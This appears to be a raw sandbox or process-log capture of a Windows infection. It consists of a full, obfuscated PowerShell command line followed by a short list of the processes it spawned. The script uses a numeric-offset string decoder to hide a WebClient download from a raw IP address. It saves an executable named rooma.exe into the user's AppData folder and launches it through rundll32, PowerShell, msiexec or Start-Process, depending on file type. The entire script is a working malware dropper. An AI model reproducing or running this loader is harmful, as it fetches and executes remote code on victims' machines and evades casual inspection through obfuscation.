powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
2104rooma.exe "C:\Users\test22\AppData\Roaming\rooma.exe"
2308firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
2852explorer.exe C:\Windows\Explorer.EXE
1236